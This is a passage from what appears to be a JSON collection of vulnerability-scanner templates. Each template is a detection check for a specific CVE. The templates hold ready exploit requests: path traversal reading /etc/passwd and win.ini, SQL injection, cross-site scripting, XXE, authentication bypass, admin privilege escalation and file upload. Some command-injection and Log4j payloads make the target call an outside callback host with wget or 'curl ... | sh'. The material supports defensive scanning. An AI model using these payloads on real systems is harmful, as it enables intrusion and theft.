Basic Z3Vlc3Q6Z3Vlc3Q=\n","GET /log_download.cgi?type=../../etc/passwd HTTP/1.1\nHost: {{Hostname}}\nAuthorization: Basic YWRtaW46YWRtaW4=\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/octet-stream"]},{"type":"regex","part":"body","regex":["root:.*:0:0:","sshd:[x*]","root:[$]"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-36380","info":{"name":"Sunhillo SureLine <8.7.0.1.1 - Unauthenticated OS Command Injection","severity":"critical"},"requests":[{"raw":["POST /cgi/networkDiag.cgi HTTP/1.1\nHost: {{Hostname}}\n\ncommand=2&ipAddr=&dnsAddr=$(wget+http://{{interactsh-url}})&interface=0&netType=0&scrFilter=&dstFilter=&fileSave=false&pcapSave=false&fileSize=\n"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2021-24227","info":{"name":"Patreon WordPress  <1.7.0 - Unauthenticated Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/?patron_only_image=../../../../../../../../../../etc/passwd&patreon_action=serve_patron_only_image"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24387","info":{"name":"WordPress Pro Real Estate 7 Theme <3.1.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /?ct_mobile_keyword&ct_keyword&ct_city&ct_zipcode&search-listings=true&ct_price_from&ct_price_to&ct_beds_plus&ct_baths_plus&ct_sqft_from&ct_sqft_to&ct_lotsize_from&ct_lotsize_to&ct_year_from&ct_year_to&ct_community=%3Cscript%3Ealert%28document.domain%29%3B%3C%2Fscript%3E&ct_mls&ct_brokerage=0&lat&lng HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain);</script>","/wp-content/themes/realestate"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-37216","info":{"name":"QSAN Storage Manager <3.3.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/http_header.php"],"headers":{"X-Trigger-XSS":"<script>alert(1)</script>"},"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["!contains(tolower(header), 'x-xss-protection')"]},{"type":"word","part":"body","words":["\"HTTP_X_TRIGGER_XSS\":\"<script>alert(1)</script>\""]},{"type":"word","part":"header","words":["text/html"]}]}]},{"id":"CVE-2021-3297","info":{"name":"Zyxel NBG2105 V1.00(AAGU.2)C0 - Authentication Bypass","severity":"high"},"requests":[{"raw":["GET /status.htm HTTP/1.1\nHost: {{Hostname}}\nCookie: language=en; login=1\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["Running Time","Firmware Version","Firmware Build Time"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-44228","info":{"name":"Apache Log4j2 Remote Code Injection","severity":"critical"},"requests":[{"raw":["GET /?x=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.uri.{{interactsh-url}}/a} HTTP/1.1\nHost: {{Hostname}}\n","GET / HTTP/1.1\nHost: {{Hostname}}\nAccept: application/xml, application/json, text/plain, text/html, */${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.accept.{{interactsh-url}}}\nAccept-Encoding: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.acceptencoding.{{interactsh-url}}}\nAccept-Language: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.acceptlanguage.{{interactsh-url}}}\nAccess-Control-Request-Headers: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.accesscontrolrequestheaders.{{interactsh-url}}}\nAccess-Control-Request-Method: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.accesscontrolrequestmethod.{{interactsh-url}}}\nAuthentication: Basic ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.authenticationbasic.{{interactsh-url}}}\nAuthentication: Bearer ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.authenticationbearer.{{interactsh-url}}}\nCookie: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.cookiename.{{interactsh-url}}}=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.cookievalue.{{interactsh-url}}}\nLocation: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.location.{{interactsh-url}}}\nOrigin: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.origin.{{interactsh-url}}}\nReferer: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.referer.{{interactsh-url}}}\nUpgrade-Insecure-Requests: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.upgradeinsecurerequests.{{interactsh-url}}}\nUser-Agent: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.useragent.{{interactsh-url}}}\nX-Api-Version: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.xapiversion.{{interactsh-url}}}\nX-CSRF-Token: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.xcsrftoken.{{interactsh-url}}}\nX-Druid-Comment: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.xdruidcomment.{{interactsh-url}}}\nX-Forwarded-For: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.xforwardedfor.{{interactsh-url}}}\nX-Origin: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.xorigin.{{interactsh-url}}}\n"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"regex","part":"interactsh_request","regex":["\\d{6}\\.([a-zA-Z0-9\\.\\-]+)\\.([a-z0-9]+)\\.([a-z0-9]+)\\.([a-z0-9]+)\\.\\w+"]}],"extractors":[{"type":"kval","kval":null},{"type":"regex","group":2,"regex":["\\d{6}\\.([a-zA-Z0-9\\.\\-]+)\\.([a-z0-9]+)\\.([a-z0-9]+)\\.([a-z0-9]+)\\.\\w+"],"part":"interactsh_request"},{"type":"regex","group":1,"regex":["\\d{6}\\.([a-zA-Z0-9\\.\\-]+)\\.([a-z0-9]+)\\.([a-z0-9]+)\\.([a-z0-9]+)\\.\\w+"],"part":"interactsh_request"}]}]},{"id":"CVE-2021-41649","info":{"name":"PuneethReddyHC Online Shopping System homeaction.php SQL Injection","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/homeaction.php"],"body":"cat_id=4'&get_seleted_Category=1","matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"word","part":"body","words":["Warning: mysqli_num_rows() expects parameter 1 to be","xdebug-error xe-warning"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-39226","info":{"name":"Grafana Snapshot - Authentication Bypass","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/snapshots/:key"],"matchers-condition":"and","matchers":[{"type":"word","words":["\"isSnapshot\":true"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-34805","info":{"name":"FAUST iServer 9.0.018.018.4 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows%5cwin.ini"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["bit app support","fonts","extensions"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-43421","info":{"name":"Studio-42 elFinder <2.1.60 - Arbitrary File Upload","severity":"critical"},"requests":[{"raw":["GET /elFinder/php/connector.minimal.php?cmd=mkfile&target=l1_Lw&name={{randstr}}.php:aaa HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n","GET /elFinder/php/connector.minimal.php?cmd=put&target={{hash}}&content={{randstr_1}} HTTP/1.1\nHost: {{Hostname}}\n","GET /elfinder/files/{{randstr}}.php%3Aaaa?_t= HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n"],"matchers":[{"type":"dsl","dsl":["contains(body_3, \"{{randstr_1}}\")","status_code == 200"],"condition":"and"}],"extractors":[{"type":"regex","name":"hash","group":1,"regex":["\"hash\"\\:\"(.*?)\"\\,"],"internal":true}]}]},{"id":"CVE-2021-45043","info":{"name":"HD-Network Realtime Monitoring System 2.0 - Local File Inclusion","severity":"high"},"requests":[{"raw":["GET /language/lang HTTP/1.1\nHost: {{Hostname}}\nReferer: {{BaseURL}}\nCookie: s_asptitle=HD-Network%20Real-time%20Monitoring%20System%20V2.0; s_Language=../../../../../../../../../../../../../../etc/passwd; s_browsertype=2; s_ip=; s_port=; s_channum=; s_loginhandle=; s_httpport=; s_sn=; s_type=; s_devtype=\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-33044","info":{"name":"Dahua IPC/VTH/VTO - Authentication Bypass","severity":"critical"},"requests":[{"raw":["POST /RPC2_Login HTTP/1.1\nHost: {{Hostname}}\nAccept: application/json, text/javascript, */*; q=0.01\nConnection: close\nX-Requested-With: XMLHttpRequest\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nOrigin: {{BaseURL}}\nReferer: {{BaseURL}}\n\n{\"id\": 1, \"method\": \"global.login\", \"params\": {\"authorityType\": \"Default\", \"clientType\": \"NetKeyboard\", \"loginType\": \"Direct\", \"password\": \"Not Used\", \"passwordType\": \"Default\", \"userName\": \"admin\"}, \"session\": 0}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"result\":true,\"session\"","id","params"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","group":1,"regex":[",\"result\":true,\"session\":\"([a-z]+)\"\\}"],"part":"body"}]}]},{"id":"CVE-2021-27931","info":{"name":"LumisXP <10.0.0 - Blind XML External Entity Attack","severity":"critical"},"requests":[{"raw":["POST /lumis/portal/controller/xml/PageControllerXml.jsp HTTP/1.1\nHost: {{Hostname}}\n\n<?xml version=\"1.0\" ?>\n<!DOCTYPE r [\n<!ELEMENT r ANY >\n<!ENTITY xxe SYSTEM \"http://{{interactsh-url}}\">\n]>\n<method name=\"addPage\">\n<id>&xxe;</id>\n</method>\n"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2021-35395","info":{"name":"RealTek Jungle SDK - Arbitrary Command Injection","severity":"critical"},"requests":[{"raw":["POST /goform/formWsc HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nsubmit-url=%2Fwlwps.asp&resetUnCfg=0&peerPin=12345678;curl http://{{interactsh-url}} | sh;&setPIN=Start+PIN&configVxd=off&resetRptUnCfg=0&peerRptPin=\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: curl"]}]}]},{"id":"CVE-2021-24176","info":{"name":"WordPress JH 404 Logger <=1.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/jh-404-logger/readme.txt"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["JH 404 Logger"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-21816","info":{"name":"D-Link DIR-3040 1.13B03 - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/messages"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["syslog:","admin","/etc_ro/lighttpd/www"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-40651","info":{"name":"OS4Ed OpenSIS Community 8.0 - Local File Inclusion","severity":"medium"},"requests":[{"raw":["POST /index.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nUSERNAME={{username}}&PASSWORD={{password}}&language=en&log=\n","GET /Modules.php?modname=miscellaneous%2fPortal.php..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd&failed_login= HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["regex('root:.*:0:0:', body)","contains(body_1, \"openSIS\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2021-40856","info":{"name":"Auerswald COMfortel 1400/2600/3600 IP - Authentication Bypass","severity":"high"},"requests":[{"raw":["GET /about/../tree?action=get HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"TYPE\"","\"ITEMS\"","\"COUNT\""],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24791","info":{"name":"Header Footer Code Manager < 1.1.14 - Admin+ SQL Injection","severity":"high"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","@timeout: 20s\nGET /wp-admin/admin.php?page=hfcm-list&orderby=%28SELECT+5619+FROM+%28SELECT%28SLEEP%286%29%29%29uWCv%29&order=DESC HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code_2 == 200","contains(content_type_2, \"text/html\")","contains(body_2,\"Add New Snippet\")"],"condition":"and"}]}]},{"id":"CVE-2021-33221","info":{"name":"CommScope Ruckus IoT Controller - Information Disclosure","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/service/v1/service-details"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/json"]},{"type":"word","words":["message","ok","data","dns","gateway"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-41653","info":{"name":"TP-Link - OS Command Injection","severity":"critical"},"requests":[{"raw":["POST /cgi?2 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: text/plain\nReferer: http://{{Hostname}}/mainFrame.htm\nCookie: Authorization=Basic YWRtaW46YWRtaW4=\n\n[IPPING_DIAG#0,0,0,0,0,0#0,0,0,0,0,0]0,6\ndataBlockSize=64\ntimeout=1\nnumberOfRepetitions=4\nhost=$(echo 127.0.0.1; curl http://{{interactsh-url}} -H 'User-Agent: {{useragent}}')\nX_TP_ConnName=ewan_ipoe_d\ndiagnosticsState=Requested\n","POST /cgi?7 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: text/plain\nReferer: http://{{Hostname}}/mainFrame.htm\nCookie: Authorization=Basic YWRtaW46YWRtaW4=\n\n[ACT_OP_IPPING#0,0,0,0,0,0#0,0,0,0,0,0]0,0\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: {{useragent}}"]}]}]},{"id":"CVE-2021-37538","info":{"name":"PrestaShop SmartBlog <4.0.6 - SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/module/smartblog/archive?month=1&year=1&day=1%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,(SELECT%20MD5(55555)),NULL,NULL,NULL,NULL,NULL,NULL,NULL--%20-"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["c5fe25896e49ddfe996db7508cf00534"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24940","info":{"name":"WordPress Persian Woocommerce <=5.8.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/admin.php?page=persian-wc&s=xxxxx%22+accesskey%3DX+onclick%3Dalert%281%29+test%3D%22 HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(header_2, \"text/html\")","status_code_2 == 200","contains(body_2, 'accesskey=X onclick=alert(1) test=')","contains(body_2, 'woocommerce_persian_translate')"],"condition":"and"}]}]},{"id":"CVE-2021-44427","info":{"name":"Rosario Student Information System Unauthenticated SQL Injection","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/Side.php"],"body":"sidefunc=update&syear=111'","headers":{"Content-Type":"application/x-www-form-urlencoded; charset=utf-8"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["DB Execute Failed. ERROR:","unterminated quoted string"],"condition":"and"},{"type":"word","part":"header","words":["RosarioSIS="]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-25281","info":{"name":"SaltStack Salt <3002.5 - Auth Bypass","severity":"critical"},"requests":[{"raw":["POST /run HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"client\":\"wheel_async\",\"fun\":\"pillar_roots.write\",\"data\":\"testing\",\"path\":\"../../../../../../../tmp/testing\",\"username\":\"1\",\"password\":\"1\",\"eauth\":\"pam\"}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["return","tag","jid","salt","wheel"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24274","info":{"name":"WordPress Supsystic Ultimate Maps <1.2.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["/wp-content/plugins/ultimate-maps-by-supsystic/modules/maps/css/"],"condition":"and"}]},{"raw":["GET /wp-admin/admin.php?page=ultimate-maps-supsystic&tab=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-21234","info":{"name":"Spring Boot Actuator Logview Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/manage/log/view?filename=/windows/win.ini&base=../../../../../../../../../../","{{BaseURL}}/log/view?filename=/windows/win.ini&base=../../../../../../../../../../","{{BaseURL}}/manage/log/view?filename=/etc/passwd&base=../../../../../../../../../../","{{BaseURL}}/log/view?filename=/etc/passwd&base=../../../../../../../../../../"],"stop-at-first-match":true,"matchers-condition":"or","matchers":[{"type":"dsl","dsl":["contains(header,'text/plain')","regex('root:.*:0:0:', body)","status_code == 200"],"condition":"and"},{"type":"dsl","dsl":["contains(header,'text/plain')","contains(body, 'bit app support')","contains(body, 'fonts')","contains(body, 'extensions')","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2021-24875","info":{"name":"WordPress eCommerce Product Catalog <3.0.39 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/edit.php?post_type=al_product&page=product-settings.php&ic-settings-search=%22+style%3Danimation-name%3Arotation+onanimationstart%3Dalert%28document.domain%29%2F%2F HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(body_2, \"alert(document.domain)\")","contains(body_2, \"eCommerce Product Catalog\")"],"condition":"and"}]}]},{"id":"CVE-2021-39501","info":{"name":"EyouCMS 1.5.4 Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?m=user&c=Users&a=logout&referurl=https://interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\\-_]*\\.)?interact\\.sh(?:\\s*?)$"]}]}]},{"id":"CVE-2021-34429","info":{"name":"Eclipse Jetty - Information Disclosure","severity":"medium"},"requests":[{"raw":["GET /%u002e/WEB-INF/web.xml HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\n\n","GET /.%00/WEB-INF/web.xml HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\n\n"],"unsafe":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</web-app>","java.sun.com"],"condition":"and"},{"type":"word","part":"header","words":["application/xml"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-42192","info":{"name":"KONGA 0.14.9 - Privilege Escalation","severity":"high"},"requests":[{"raw":["POST /login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"password\": \"{{password}}\", \"identifier\": \"{{username}}\"}\n","POST /api/user/{{id}} HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\nReferer: {{BaseURL}}\nContent-Type: application/json;charset=utf-8\n\n{\"token\": \"{{token}}\"}\n","PUT /api/user/{{id}} HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\nReferer: {{BaseURL}}\nContent-Type: application/json;charset=utf-8\n\n{\"admin\": \"true\", \"passports\": {\"password\": \"{{password}}\", \"protocol\": \"local\"}, \"token\": \"{{token}}\", \"password_confirmation\": \"{{password}}\"}\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(body_2, \"\\\"admin\\\":false\")","contains(body_3, \"\\\"admin\\\":true\")"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"id","group":1,"regex":["\"id\":([0-9]+)"],"internal":true,"part":"body"},{"type":"regex","name":"token","group":1,"regex":["\"token\":\"(.*)\""],"internal":true,"part":"body"}]}]},{"id":"CVE-2021-31589","info":{"name":"BeyondTrust Secure Remote Access Base <=6.0.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/appliance/login.ns?login%5Bpassword%5D=test%22%3E%3Csvg/onload=alert(document.domain)%3E&login%5Buse_curr%5D=1&login%5Bsubmit%5D=Change%20Password"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<svg/onload=alert(document.domain)>","bomgar"],"case-insensitive":true,"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-38314","info":{"name":"WordPress Redux Framework <=4.2.11 - Information Disclosure","severity":"medium"},"requests":[{"raw":["GET /wp-admin/admin-ajax.php?action={{md5(replace('http://HOST/-redux','HOST',Hostname))}} HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n","GET /wp-admin/admin-ajax.php?action={{md5(replace('https://HOST/-redux','HOST',Hostname))}} HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["len(body)<50"]},{"type":"regex","name":"meme","part":"body","regex":["[a-f0-9]{32}"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","regex":["[a-f0-9]{32}"],"part":"body"}]}]},{"id":"CVE-2021-21287","info":{"name":"MinIO Browser API - Server-Side Request Forgery","severity":"high"},"requests":[{"raw":["POST /minio/webrpc HTTP/1.1\nHost: {{interactsh-url}}\nContent-Type: application/json\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36\nContent-Length: 76\n\n{\"id\":1,\"jsonrpc\":\"2.0\",\"params\":{\"token\":  \"Test\"},\"method\":\"web.LoginSTS\"}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","words":["We encountered an internal error"]}]}]},{"id":"CVE-2021-44528","info":{"name":"Open Redirect in Host Authorization Middleware","severity":"medium"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\nX-Forwarded-Host: //interact.sh\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]},{"type":"status","status":[301,302,307,308]}]}]},{"id":"CVE-2021-24827","info":{"name":"WordPress Asgaros Forum <1.15.13 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 15s\nGET /forum/?subscribe_topic=1%20union%20select%201%20and%20sleep(6) HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(content_type, \"text/html\")","contains(body, \"asgarosforum\")"],"condition":"and"}]}]},{"id":"CVE-2021-26294","info":{"name":"AfterLogic Aurora and WebMail Pro < 7.7.9 - Information Disclosure","severity":"high"},"requests":[{"raw":["GET /dav/server.php/files/personal/%2e%2e/%2e%2e//%2e%2e//%2e%2e/data/settings/settings.xml HTTP/1.1\nHost: {{Hostname}}\nAuthorization: Basic Y2FsZGF2X3B1YmxpY191c2VyQGxvY2FsaG9zdDpjYWxkYXZfcHVibGljX3VzZXI\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<AdminLogin>","<AdminPassword>","<DBHost>"],"condition":"and"},{"type":"word","part":"header","words":["application/octet-stream"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2000-0760","info":{"name":"Jakarta Tomcat 3.1 and 3.0 - Exposure","severity":"low"},"requests":[{"method":"GET","path":["{{BaseURL}}/examples/jsp/snp/snoop.jsp"],"matchers-condition":"and","matchers":[{"type":"word","words":["Request Information","Path info","Server name","Remote address"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2000-0114","info":{"name":"Microsoft FrontPage Extensions Check (shtml.dll)","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/_vti_inf.html"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["_vti_bin/shtml.dll"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-25356","info":{"name":"Alt-n/MDaemon Security Gateway <=8.5.0 - XML Injection","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/SecurityGateway.dll?view=login&redirect=true&9OW4L7RSDY=1"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Exception: Error while [Loading XML","&lt;RegKey&gt;","&lt;IsAdmin&gt;"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-23854","info":{"name":"AVEVA InTouch Access Anywhere Secure Gateway - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/AccessAnywhere/%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255cwindows%255cwin.ini"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["for 16-bit app support","extensions"],"condition":"and"},{"type":"word","part":"header","words":["text/ini","application/octet-stream"],"condition":"or"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-27985","info":{"name":"Cuppa CMS v1.0 - SQL injection","severity":"critical"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nuser={{username}}&password={{password}}&language=en&task=login\n","POST /alerts/alertLightbox.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nurl=components%2Fpermissions%2Flist_permissions_lightbox.php&title=Permissions%3A+profile&params%5Bgroup%5D=3'+UNION+ALL+SELECT+md5('{{num}}'),null--+-&params%5Breference%5D=41&uniqueClass=new_content_3983163\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{md5(num)}}"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-1162","info":{"name":"GitLab CE/EE - Hard-Coded Credentials","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/users/sign_in"],"redirects":true,"max-redirects":3,"matchers":[{"type":"word","words":["003236d7e2c5f1f035dc8b67026d7583ee198b568932acd8faeac18cec673dfa","1d840f0c4634c8813d3056f26cbab7a685d544050360a611a9df0b42371f4d98","6eb5eaa5726150b8135a4fd09118cfd6b29f128586b7fa5019a04f1c740e9193","6fa9fec63ba24ec06fcae0ec30d1369619c2c3323fe9ddc4849af86457d59eef","cfa6748598b5e507db0e53906a7639e2c197a53cb57da58b0a20ed087cc0b9d5","f8ba2470fbf1e30f2ce64d34705b8e6615ac964ea84163c8a6adaaf8a91f9eac"],"condition":"or"}],"extractors":[{"type":"regex","group":1,"regex":["(?:application-)(\\S{64})(?:\\.css)"]}]}]},{"id":"CVE-2022-1952","info":{"name":"WordPress eaSYNC Booking <1.1.16 - Arbitrary File Upload","severity":"critical"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nCookie: PHPSESSID=a0d5959357e474aef655313f69891f37\nContent-Type: multipart/form-data; boundary=------------------------98efee55508c5059\n\n--------------------------98efee55508c5059\nContent-Disposition: form-data; name=\"action\"\n\neasync_session_store\n--------------------------98efee55508c5059\nContent-Disposition: form-data; name=\"type\"\n\ncar\n--------------------------98efee55508c5059\nContent-Disposition: form-data; name=\"with_driver\"\n\nself-driven\n--------------------------98efee55508c5059\nContent-Disposition: form-data; name=\"driver_license_image2\"; filename=\"{{randstr}}.php\"\nContent-Type: 